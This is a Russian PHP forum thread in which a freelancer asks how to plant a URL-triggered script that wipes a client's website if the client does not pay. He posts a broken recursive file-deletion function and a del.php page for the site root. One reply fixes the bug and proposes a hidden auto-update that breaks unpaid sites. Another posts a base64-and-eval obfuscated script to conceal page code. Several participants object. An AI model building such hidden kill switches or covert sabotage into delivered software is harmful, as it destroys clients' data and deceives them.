[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: Удаление сайта.
Melinio
Доброго времени суток.
Подскажите пожалуйста возможно как то реализовать удаление сайта через ссылку?
Допустим сделал сайт на заказ, а заказчик не оплатил заказ.
В таком случае просто переходишь на адрес какого то скрипта и папка с сайтом удаляется.

Заранее благодарен!
Winston
Можно. Но не нужно.
Есть и другие методы борьбы с кидалами. Например договор заключить, предоплату взять, предать все доступы только после полной оплаты проекта, и т.п.
Melinio
Цитата (Winston @ 3.11.2014 - 14:26)
Можно. Но не нужно.
Есть и другие методы борьбы с кидалами. Например договор заключить, предоплату взять, предать все доступы только после полной оплаты проекта, и т.п.

Я пока делаю сайты-визитки, и цена не такая уж и высокая что бы заключать договор. Да и пока "набиваю руку" цена работы назначается заказчиком после выполнения заказа!

По этому мне необходим данный способ удаления.

Я нашел кое что:

function removeDir($path) {
if (is_file($path)) {
@unlink($path);
} else {
array_map('removeDir',glob('/*')) == @rmdir($path);
}
@rmdir($path);
}


Пример вызова:

$path = $_SERVER['DOCUMENT_ROOT'].'/test';
removeDir($path);


Но я со своими знаниями к сожалению не могу понять как вызывать через адресную строку.
Melinio
Если создаю вот такой файл del.php в корне сайта:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<
html>
<
head>
<
meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<
title>Скрипт удаления</title>
</
head>
<?php
function
removeDir($path) {
if (is_file($path)) {
@unlink($path);
} else {
array_map('removeDir',glob('/*')) == @rmdir($path);
}
@rmdir($path);
}
?>

<?php

$path = $_SERVER['DOCUMENT_ROOT'].'/test';
removeDir($path);
?>

<body>
</
body>
</
html>


То выдает ошибку при открытии del.php в браузере:
 Fatal error: Maximum function nesting level of '250' reached, aborting! in C:\WebServer\OpenServer\domains\localhost\del.php on line 12
inpost
Melinio
Пишешь админам на хостинге, в 99% создаются бекапы. Варианты:
1 раз в день
1 раз в неделю.
__________________
Если оплатили за первый вариант, то откат до последней разработки и всё.
П.С. мануал: как восстановить удалённый сайт программистом user posted image

А зачем ты вызываешь из функции функцию не меняя параметры? У тебя неверно написал код, так как я уверен, что у тебя нет на сайте 250 вложенностей.

__________________

Ставь контроль версий, чтобы код не работал, если на твоём сайте через АПИ не выданы права. Так надежнее тем, что самостоятельно без оплаты другому программисту не исправить.
Кроме этого можно сделать систему патчей, чтобы при открытии сайт обновлялся до последней версии. Тогда неоплаченный сайт будет обновляться до нерабочей версии. Кроме этого автообновление можно всегда указать в договоренностях с заказчиком так, что никто не придерётся.

_____________
Обучаю веб-программированию качественно и не дорого: http://school-php.com
Фрилансер, принимаю заказы: PHP, JS, AS (видео-чаты). Писать в ЛС (Личные сообщения на phpforum).
Melinio
Цитата (inpost @ 3.11.2014 - 14:47)
Melinio
Пишешь админам на хостинге, в 99% создаются бекапы. Варианты:
1 раз в день
1 раз в неделю.
__________________
Если оплатили за первый вариант, то откат до последней разработки и всё.
П.С. мануал: как восстановить удалённый сайт программистом  user posted image 

А зачем ты вызываешь из функции функцию не меняя параметры? У тебя неверно написал код, так как я уверен, что у тебя нет на сайте 250 вложенностей.

__________________

Ставь контроль версий, чтобы код не работал, если на твоём сайте через АПИ не выданы права. Так надежнее тем, что самостоятельно без оплаты другому программисту не исправить.
Кроме этого можно сделать систему патчей, чтобы при открытии сайт обновлялся до последней версии. Тогда неоплаченный сайт будет обновляться до нерабочей версии. Кроме этого автообновление можно всегда указать в договоренностях с заказчиком так, что никто не придерётся.

Это все слишком сложно, я делаю пока что "сайты-визитки" на HTML + CSS без PHP. Хочу руку набить и потом уже учить PHP.
walerus
Melinio Рассмотрим "другую сторону медали". Вам оплатили все, сайт работает.

Вы, через неделю запускаете свой киллкод, сайта - нет.
- Это как асфальт укладывать, по документам уложили участок в 2кв.км, а по факту, залатали 10ть ям, с намеком на то, что бы в следующем году, был "фронт" работы.

Так для чего вам такой скрипт??? Была у меня такая проблема, тоже писал что то подобное, вычищало все под самый рут.

Но это не выход из положения... Делаете у себя на хостинге работу, потом показываете работодателю, после этого оплата и если все устраивает, передаете клиенту выполненную работу.
Melinio
Цитата (walerus @ 3.11.2014 - 15:14)
Melinio Рассмотрим "другую сторону медали". Вам оплатили все, сайт работает.

Вы, через неделю запускаете свой киллкод, сайта - нет.
- Это как асфальт укладывать, по документам уложили участок в 2кв.км, а по факту, залатали 10ть ям, с намеком на то, что бы в следующем году, был "фронт" работы.

Так для чего вам такой скрипт??? Была у меня такая проблема, тоже писал что то подобное, вычищало все под самый рут.

Но это не выход из положения... Делаете у себя на хостинге работу, потом показываете работодателю, после этого оплата и если все устраивает, передаете клиенту выполненную работу.

Скрипт мне нужен для предосторожности. Смысл мне удалять сайт через неделю если человек его оплатил? Он в дальнейшем может у меня заказать обновление или другой сайт... Не понимаю зачем делать "говно" своим клиентам.
Не вижу смысла обсуждения для чего и почему.
Я спросил "как реализовать", а не "для чего мне это надо".
Спасибо за понимание!
inpost
Melinio
Я же ответил тебе как подправить твой код.

_____________
Обучаю веб-программированию качественно и не дорого: http://school-php.com
Фрилансер, принимаю заказы: PHP, JS, AS (видео-чаты). Писать в ЛС (Личные сообщения на phpforum).
AllesKlar
Melinio
По-моему самый простой и надежный вариант - размещаешь сайт на своем хостинге. Демонстрируешь. После оплаты отдаешь исходники / устанавливаешь на хостинг заказчика.
А что-то там удалять... при нормально настроенном хостинге ты не сможешь от пользователя apache удалить папки со скриптами, если на то не было специально выдано прав.

_____________
[продано копирайтерам]
waldicom
Человек делает на "html+css". Какой тут уж нафих свой сервер, когда у людей есть "Сохранить страницу на диск".
А ТСу надавать по рукам. Больно больно. И тут же по голове ударить. Чтобы понял.

_____________
Свои мозги еще никто не отменял.
Телепатов нету.
AllesKlar
Ну тогда как-то так:

было:
<!DOCTYPE html>
<html>
<head>
<meta
http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>

.class1
{
color: #ff0000;
}
</style>
</head>
<body>
<p
class='class1'>
Вот тут такой вот текст
</p>
</body>
</html>


стало:
<script language="javascript" type="text/javascript">var OI1='==gCpkSKnw3JoQXasB3cucSek9mY8VGchN2cl5Wd8VGdpJ3d8RGbph2Qk5WZwBXY8JzM0ATd
8t2b8BzM0ATd8Rnbl1WZsVUZ0FWZyNGfxM3chx2Y3IDfsJXd8VWbh50ZhRVeCNHduVWblxWR0V2Z8x
kUVx3YyNHdldGfxQDNwUHfGRVVENDf1MDNwUHf8xHf8xHc0RHawIDfhRXZtN0M8NmczxnZlJHfFBVWU
N0TEFjM8BHd0hGfvZmbpxXawFWeyVWdxpGfkFWZoN0M8xWb0h2QzwHdwlmcjNHflxWe0N3Qzw3M0
QDM1xnMxQDM1xHbtRHawIDf0V2cyFGajBjM8RnblRnbvNkMywndpVXclxXZwlHV8V0M0ATd8B3Qzwnc
lJnclZWZyxXZslHdzxHduVWb1N2bkx3czFGbjBjM8J3bs92Y5ADfEdDfyFmd8FDbJxHf8xWMx8Ff05WZu9
Gct92QJJVVlR2bj5WZ8BDMwAjZmNjM8lHZvJ2QzwXZwF2YzV2X8FzczFGbjxXQwwXO1EDfycDfs1Gdox
nQ3wnM0QDM1xXOwwHZhVGa8F0M0ATd8RnblRnbvNGMywHd4VGdyIDf5MDNwUHf0lGbwNHfsFmdlx
HdulUZzJXYwxnM2wXZk92QyFGaD12byZGf3Vmb8dmbpJHdT9Gd8BHeFdWZSxnZpx3Zulmc0NFflxWa
odHflNWYsBXZyxnbyVHdlJHfu9Wa0Nmb1ZGf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf
8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8x
Hf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8x
Hf8xHf8xHf8xH
f8xHf8xHf8xHf8x3JsMDNywiM2wyJpkSf7xCMskyJcx3JchSTy4yJcBlM8h2M89kM85kM8plM8V3M8R3M8
N3M8Z3M8d0M8p3M8l3M8h3M8J3M8F3M8t2M8p2M8l2M8x2M812M8B3M8xkM892M852M8Z0M8xHSzw
HfUNDfTNDfSNDfVNDf8F1M8x3TzwnSzwHUzwXSzw3SzwHTzwnTzwXTzw3dzwXZzwnVywXVyw3Vywn
SywXNzwXWywXRzw3Q
zwHVyw3UywHRywXSywnQywHSywnRywXRywXTyw3RywnNzw3Qyw3Syw3YzwnYzwHZzwnZzwXYzw
XOzwXQzwnMzwXMzw3MzwHNzwHOz
w3NzwHRzw3ZzwHMzwnQzwXUywnUywXQywneywHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8
xHf8xHf8xHf8xHf8xHf8x
Hf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8dCXsglMsokMscCXpkSKnwFXcx3JcxFXooXMucCXcxlNywXNywHN
yw3MywHOywXYyw3Nywn
ZywnYywXMywnWxwHVxw3UxwnUxwXUxwXVxwnVxwXWxwHWxw3VxwXZywXbywHdyw3cywncywn
dywXdywHeywXeyw3dywHcywnaywXa
ywHayw3ZywXcyw3aywHbyw3bywnbyw3Yyw3Txw3bxwnbxwXbxwHcxwHfxFDf0FDfzFDfyFDfsFDfrFD
fkFDfmFDfjFDfQFDfyIDflFDfnFDfqFDfpFDfoFDf8VXM8BjM8lUM8hUM8dUM8pUM8tUM8dCXcxFLOFDLNF

DLnwFXctTKpgGK5EDK4EjL3sTKhhyNx4ia70FMblyJcxFXcxFXcd2JcxFXcxFXchCVucTPqBiY7kyUucDKrt
yJcxFXcxFXc1TVmcCXcxFXcxFXrkiVucDKrtyJcxFXcxFXc1zVmcC
XcxFXcxFXrcCXcxFXcxFXS1TU/8STuw0LvojTnwFXcxFXcxVPP5SY7kyJcxFXcxFXcB1JcxFXcxFXchSWu
cTPhBiY7cCXcxFXcxFXyUiZvUTJxUiMlYTMvUTJxUiMlA3L1UyM
lETJ0USNxUSalQTMlQTJ2UCNlMWJwETJ2UySlMWJpViWlQTJ2UCNlETMlQTJ2UCNlMWJyETJzUyMlETJyU
yMxUCWlkTJuVCblMTJxUiMlI
XJxUiMlc2L1USMlITJt9SNlETJxVyMlETJkVyclYTJ0VyblMTJxUSdlMTJxUiSuMTJxUiMlYXJxUiMlUWJ40iRlU
UJkViZvcUJ5UCSlUWJJ1CRlkTJD1CelcXJxUiMlkXJxUiMloXJxUiMlIUJBVSNlcCXcxFXcxFX9gGIidCXcxFK
9BHIiFTf9lS
Xjt1askyJcxFXndCXcxFLnwFXcJGXcxFXcxFXcdCXcx1KpMGKltyJcxFXixFXcxFXcxFXnwFXchiQxAyQxg
CRx4Cc9A3ep01YbtGKBFzep0SLjhydxsTfpkCexgSex4yY6kSOysyYoUUMuYUM/wUM+kSYlMWPjhCKr
kSKpE2LjhidxgSZ6cCXcx1JcxFX
/EGPjhiYxsXKjhSYx0TZ7lCZsUGLrxyYsEGLwhSYxgCZycCXo0HcgEkM91XKdN2WrxSKnw1ZnwFLnwlY
cxFXcdCXrkyYoU2KnwlYcxFXcdCXoYkMggkMoIkMuAXPwtXKdN2WrhSRysXKt0yYoMkM70XM9M2O9d
CXrcHXcxFXnwVQysXKoonM9U2Od1XXltFZgEkM7lSZoonMb1za9lyYoUGf811YbtWPdlyYoU2WktXKt0y
YoMkM7lSKEJDLv41LoIkMucCXnwVIoUkM70XKpYzMockMuMmOpkjMrMGKJJjLEJzP1MjPpEWJj1zYogy
KpkSKh9yYoskMoUmOnw1Jc9TY8MGKBJzepMGK6JTPltXKkxSZssGLjxS
YsAHK6JDKMJzJo0Hcg4mc1RXZy1Xfp01YbtGLpcyZnwyJixFXnsSKjhSZrciYcx1JoAHeFdWZSBydl5GKlN
WYsBXZy5Cc9A3ep01YbtGKml2ep0SLjhSZslGa3tTfpkiNzgyZulmc0N1b05yY6kSOysyYoUGZvNkchh2
Qt9mcm5yZulmc0N1P1MjPpEWJj1zYogyKpkSKh9yYoQnbJV2cyFGcoUmOncyPhxzYo4mc1RXZytXKjhi
bvlGdj5Wdm1TZ7lCZsUGLrxyYsEGLwhibvl Gdj5WdmhCbhZXZ';function _0OO(data){var
OOllOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var
o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=OOllOI.indexOf(data.charAt(i++));
h2=OOllOI.indexOf(data.charAt(i++));h3=OOllOI.indexOf(data.charAt(i++));
h4=OOllOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&
0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64)
{enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.le
ngth);return enc} function OOl(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){
ret += string.charAt(i);} return ret; }eval(_0OO(OOl(OI1)));</script>



И плюс свой хостинг :)

_____________
[продано копирайтерам]
Быстрый ответ:

 Графические смайлики |  Показывать подпись
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2024 Invision Power Services, Inc.